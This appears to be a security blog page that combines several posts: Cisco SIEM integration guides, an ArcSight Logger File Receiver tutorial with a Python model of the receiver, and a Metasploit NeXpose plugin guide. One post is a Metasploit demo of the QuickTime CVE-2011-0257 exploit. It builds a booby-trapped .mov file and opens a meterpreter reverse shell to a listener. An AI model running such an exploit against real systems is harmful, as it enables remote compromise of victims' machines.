Cisco Smart Business Architecture (SBA) guides for SIEM solutions integration

Cisco provides a set of useful Smart Business Architecture (SBA) guides for SIEM integration. They help you design and deploy best practices covering Cisco switching, routing, security and wireless technologies.

Currently the SBA guides cover the following solutions:

  • SBA guide giving a general overview of SIEM technology, best practices, use cases and deployment considerations for using a SIEM with a Cisco infrastructure, including the log retrieval methods for Cisco products.
  • SBA guide for ArcSight SIEM platform integration (ESM, Logger, Express, SmartConnectors and Content Pack).
  • SBA guide for LogLogic MX Series SIEM product integration.
  • SBA guide for netForensics nFX Cinxi One SIEM product integration.
  • SBA guide for RSA enVision SIEM product integration.
  • SBA guide for the Splunk security management solution.

ArcSight Logger File Receiver Configuration

ArcSight Logger offers several kinds of receivers:

  • UDP receiver for UDP messages, such as SYSLOG.
  • TCP receiver for TCP messages, such as SYSLOG, which can also be sent over TCP.
  • CEF UDP receiver for CEF (Common Event Format) messages sent through UDP.
  • CEF TCP receiver for CEF (Common Event Format) messages sent through TCP.
  • SmartMessage receiver for encrypted SmartMessage messages sent by SmartConnectors.
  • File Transfer to read remote logs using scp, sftp or ftp.
  • File Receiver to read logs from a local or remote file system such as NFS, CIFS or SAN.

In my previous blog posts, we configured SmartConnectors to send their messages to the Logger SmartMessage receiver. SmartMessage reception is the most common method in a typical ArcSight Log Management infrastructure. With SmartConnectors and the SmartMessage receiver you benefit from:

  • SmartConnector normalization, categorization, aggregation, batching and filtering.
  • SmartMessage encrypted transmission of messages.

But it can happen that you need to collect events without a SmartConnector or FlexConnector. For example, you may already have a network file system (NFS) centralizing all your Apache HTTP Server log files, or you may not be allowed to install a SmartConnector on a system while the policy forbids sending messages over UDP. The Logger File Receiver gives you an alternative so that you can still collect the events.

File Receiver Configuration

The ArcSight Logger File Receiver allows you to read files from a network file system (NFS), CIFS share or storage area network (SAN). The free ArcSight Logger L750MB, however, only allows a File Receiver on a local folder. The ArcSight Logger L750MB processes run under the “arcsight” user and group, so that user must have read permission on the folder (and write permission on it if you intend to use the “Rename” or “Delete” modes described below).

In order to set up a File Receiver on ArcSight Logger L750MB, first create a “filereceiver01” folder in “$ARCSIGHT_HOME”. Alternatively, mount an NFS, CIFS or SAN share on the Logger file system.

Then log into the Logger web interface and go to “Configuration -> Event Input/Output”. Click the “Add” button, give your File Receiver a name (for example: FileReceiver01), select “File Receiver” in the pull-down list and click the “Next” button.

To complete the setup, specify the following information:

  • RFS Names : On an L750MB Logger you can only select “LOCAL”; on a Logger appliance you can select a previously declared NFS, CIFS or SAN share.
  • Folder : Specify the folder path, in our example “/home/arcsight/filereceiver01”.
  • Source Type : Select your log file type from the pull-down list: “Microsoft DHCP Log”, “Juniper Steel-Belted Radius”, “Apache HTTP Server Error”, “Apache HTTP Server Access”, “IBM DB2 Audit” or “Other”. The “Other” choice lets you import any kind of log.
  • Wildcard (regex) : A regular expression describing which files in the folder to read. “.*” means all files.
  • Mode : Select from the pull-down list. In “Persist” mode, the Logger remembers which files have been processed and processes each of them only once. In “Rename” mode, the log file is renamed once it has been processed. In “Delete” mode, the file is deleted once it has been processed.
  • Rename extension : If you selected the “Rename” mode, the suffix to append to processed log files. By default “.done”.
  • Character encoding : Select the character encoding of the log files.
  • Delay after seen : The number of seconds to wait after a source file is first seen before it is processed. This allows the entire file to be copied before processing begins. By default “10” seconds.
  • Date/time locale : Select your locale from the pull-down list.
  • Date/time zone : Select your time zone from the pull-down list; it is used when the log file itself carries no time zone. By default, the Logger time zone is used.
  • Date/time loc. regex : A regular expression describing which characters represent the timestamp in each log line. By default no timestamp is expected in the log file.
  • Date/time format : If timestamps are present in the log file, the format of those timestamps, expressed with format specifiers. By default no timestamp is expected in the log file.
  • Event start (regex) : If your log files contain multi-line events, a regular expression describing the start of a new event in the log file. By default, each line of the log file is considered a single event.

Then save your configuration. You will have to activate the File Receiver by clicking the button on the right.

Directly after the File Receiver is activated, a Device is created under “Configuration -> Devices”. To make searching File Receiver events easier, I recommend creating a dedicated Device Group (e.g. FileReceiver) under “Configuration -> Devices -> Device Groups”, and associating the newly created File Receiver device with this new Device Group.

I also recommend dedicating a Storage Group (e.g. File Receivers) to all events coming from File Receivers, under “Configuration -> Storage -> Storage Groups”. You can rename an existing Storage Group and adjust its retention period and maximum size.

Associate the new Device Group with the renamed Storage Group through a Storage Rule, under “Configuration -> Storage -> Storage Rules”.

Finally, restart the File Receiver by clicking the button on the right twice. If you do not restart the receiver, the Device Group and Storage Group associated with it are not applied.
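To make the receiver options concrete, here is a small model of the File Receiver behaviour described above. It is an added example written for this post, not ArcSight code: it reproduces the “Wildcard (regex)”, “Persist”/“Rename”/“Delete” modes, “Rename extension”, “Delay after seen” and “Event start (regex)” semantics over a local folder, which is enough to reason about what the Logger will and will not pick up. The class and function names, the sample Apache-style log lines and the temporary folder are all constructed for the example.

```python
import os
import re
import tempfile
import time
from dataclasses import dataclass, field


@dataclass
class FileReceiver:
    """Model of one Logger File Receiver (illustrative, not ArcSight code)."""
    folder: str
    wildcard: str = ".*"             # "Wildcard (regex)": which file names to read
    mode: str = "persist"            # "Mode": persist | rename | delete
    rename_extension: str = ".done"  # "Rename extension" (rename mode only)
    delay_after_seen: float = 10.0   # "Delay after seen", in seconds
    event_start: str = ""            # "Event start (regex)"; empty = one event per line
    encoding: str = "utf-8"          # "Character encoding"
    first_seen: dict = field(default_factory=dict, repr=False)
    processed: set = field(default_factory=set, repr=False)  # persist-mode bookkeeping

    def candidates(self):
        """Files in the folder that still have to be processed."""
        pattern = re.compile(self.wildcard)
        for name in sorted(os.listdir(self.folder)):
            path = os.path.join(self.folder, name)
            if not os.path.isfile(path) or not pattern.fullmatch(name):
                continue
            if self.mode == "rename" and name.endswith(self.rename_extension):
                continue                      # already processed and renamed
            if self.mode == "persist" and path in self.processed:
                continue                      # persist mode: read each file once
            yield path

    def split_events(self, text):
        """Cut file content into events, honouring the event-start regex."""
        lines = [line for line in text.splitlines() if line.strip()]
        if not self.event_start:
            return lines                      # default: each line is one event
        start = re.compile(self.event_start)
        events, current = [], []
        for line in lines:
            if start.search(line) and current:
                events.append("\n".join(current))
                current = []
            current.append(line)
        if current:
            events.append("\n".join(current))
        return events

    def poll(self, now=None):
        """One receiver pass; returns the events read during this pass."""
        now = time.time() if now is None else now
        events = []
        for path in self.candidates():
            seen = self.first_seen.setdefault(path, now)
            if now - seen < self.delay_after_seen:
                continue                      # give the copy time to finish
            with open(path, encoding=self.encoding, errors="replace") as fh:
                events.extend(self.split_events(fh.read()))
            del self.first_seen[path]
            if self.mode == "persist":
                self.processed.add(path)
            elif self.mode == "rename":
                os.rename(path, path + self.rename_extension)
            elif self.mode == "delete":
                os.remove(path)
        return events


# Constructed sample log content (not real traffic).
ACCESS_LOG = (
    '10.0.0.5 - - [03/Sep/2011:10:00:01 +0200] "GET / HTTP/1.1" 200 1043\n'
    '10.0.0.9 - - [03/Sep/2011:10:00:02 +0200] "GET /admin HTTP/1.1" 403 512\n'
)
ERROR_LOG = (
    "[Sat Sep 03 10:00:03 2011] [error] [client 10.0.0.9] script failed\n"
    "  Traceback (constructed):\n"
    '    File "app.py", line 12\n'
    "[Sat Sep 03 10:00:04 2011] [notice] caught SIGTERM, shutting down\n"
)


def demo():
    """Drop the sample files into a temporary 'filereceiver01' and poll three times."""
    folder = tempfile.mkdtemp(prefix="filereceiver01_")
    for name, body in (("access.log", ACCESS_LOG), ("error.log", ERROR_LOG),
                       ("notes.txt", "not a log\n")):
        with open(os.path.join(folder, name), "w", encoding="utf-8") as fh:
            fh.write(body)
    # One receiver per source type, as the Logger configuration expects.
    access_rx = FileReceiver(folder, wildcard=r"access\.log.*", mode="persist")
    error_rx = FileReceiver(folder, wildcard=r"error\.log.*", mode="rename",
                            event_start=r"^\[[A-Z][a-z]{2} ")
    first = access_rx.poll(now=1000.0) + error_rx.poll(now=1000.0)   # too early
    second = access_rx.poll(now=1011.0) + error_rx.poll(now=1011.0)  # 11 s later
    third = access_rx.poll(now=1030.0) + error_rx.poll(now=1030.0)   # nothing new
    return {"first": first, "second": second, "third": third,
            "files": sorted(os.listdir(folder))}


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The first pass returns nothing because both files were seen less than 10 seconds ago; the second pass returns two access-log events and two error-log events, the first of which spans three lines thanks to the event-start regex; the third pass returns nothing because the access log is remembered in persist mode and the error log has been renamed to “error.log.done”, which the receiver skips. Note that a file that does not match the wildcard (“notes.txt”) is never touched, and that the rename needs write permission on the folder for the “arcsight” user.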

Retrieving events from File Receiver

If you have created dedicated Device Groups and/or Storage Groups for the File Receiver, you will be able to find the associated events easily through the Logger search engine.

For searches on Device Groups, just type the following command, where “FileReceiver” is your Device Group.

For searches on Storage Groups, just type the following command, where “File Receivers” is your Storage Group.

You can also mix all these search parameters.

Receivers Debugging

All activities related to the Logger Receivers are located in the “/home/arcsight/current/arcsight/logger/logs/logger_receiver.log” log file.

“receiver_https” corresponds to the SmartMessage Receiver, and “rfs_file_receiver” to the newly added File Receiver.

“Eps(SLC)” is the current EPS rate, “Total Events” the total number of events the receiver has processed since its last restart, “Eps(max)” the maximum EPS rate the receiver has reached since its last restart, and “Bps(SLC)” the bytes per second the receiver is currently processing.

CVE-2011-0257 : Apple QuickTime PICT PnSize Buffer Overflow Metasploit demo

Timeline :

Vulnerability discovered by Matt “j00ru” Jurczyk and submitted to ZDI
Vulnerability reported to the vendor by ZDI on 2011-04-11
Coordinated public release of the vulnerability on 2011-08-08
Metasploit PoC provided on 2011-09-03

PoC provided by :

MC

Reference(s) :

CVE-2011-0257
ZDI-11-252

Affected version(s) :

All Apple QuickTime Player versions prior to 7.7

Tested on Windows XP SP3 with :

Apple QuickTime Player 7.6 (472)

Description :

This module exploits a vulnerability in Apple QuickTime Player 7.60.92.0. When opening a .mov file containing a specially crafted PnSize value, an attacker may be able to execute arbitrary code.

Commands :

use exploit/windows/fileformat/apple_quicktime_pnsize
set FILENAME hollidays.mov
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

getuid
sysinfo

Metasploit NeXpose bridge plugin – Part 1

Metasploit includes a bridge plugin between the penetration testing framework and the NeXpose vulnerability management scanner from Rapid7. This blog post describes how to use the basic commands of this bridge plugin.

As a prerequisite for the NeXpose bridge plugin, Metasploit must be running with a database backend. To connect Metasploit to a database backend, use the “db_connect” command :

The “db_connect” command automatically creates the database and the related tables.

To verify the database connection you can use the “db_status” command.

You can now load the NeXpose bridge plugin with the “load nexpose” command.

Generic commands

  • Connecting to NeXpose – nexpose_connect :

To connect to NeXpose, just type :

nexpose_connect login:password@nexpose_ip:port <ssl ok>

“login” and “password” are your NeXpose user login and password. “nexpose_ip” is the IP address or hostname of the NeXpose instance. “port” is the port NeXpose listens on, by default 3780/tcp. The “ok” argument acknowledges that NeXpose uses a self-signed certificate and that you accept the associated risk.

  • Logout from NeXpose – nexpose_disconnect :

To disconnect from NeXpose, just run the following command :

  • Checking NeXpose system information – nexpose_sysinfo :

To check the NeXpose system information (database version, Java information, uptime, installation directory, free memory, last update id, etc.), run the following command :

NeXpose Useful Commands

  • Getting help for NeXpose commands – nexpose_command help :

To have a complete list of all NeXpose commands, just run the following command.

  • Getting NeXpose version information – nexpose_command ver :
This command displays the current software version, serial number and most recent update.

  • Updating NeXpose engines – nexpose_command update engines :
The following command will send pending updates to all defined Scan Engines.

  • Check and apply NeXpose updates – nexpose_command update now :
The following command will check for and apply updates manually and immediately, instead of waiting for an automatic, scheduled update.

  • Getting NeXpose server scheduled jobs – nexpose_command schedule :
The following command displays the currently scheduled jobs, such as scans, the auto-update retriever, the temporal risk score updater, the data warehouse exporter and log rotation.

  • Getting NeXpose database diagnostics – nexpose_command database diagnostics :

The following command will check the database for inconsistencies, such as multiple entries for an asset.

  • Getting complete NeXpose diagnostics – nexpose_command diag :

The following command will display diagnostic information that may be useful for debugging or monitoring of activity.

  • Stopping NeXpose – nexpose_command exit or nexpose_command quit :

Both commands stop the NeXpose server.

  • Restarting NeXpose – nexpose_command restart :
This command will restart the NeXpose server.

  • Ping a host from the NeXpose server – nexpose_command ping HOST [PORT] :
This command will ping the specified host using an ICMP ECHO request, TCP ACK packet, and TCP SYN packet. The default TCP port is 80.

  • Traceroute from the NeXpose server – nexpose_command traceroute HOST :
This command determines the IP route between your NeXpose server and the hostname or IP address you specify.

In the next blog post we will describe the commands related to sites, site devices and scans.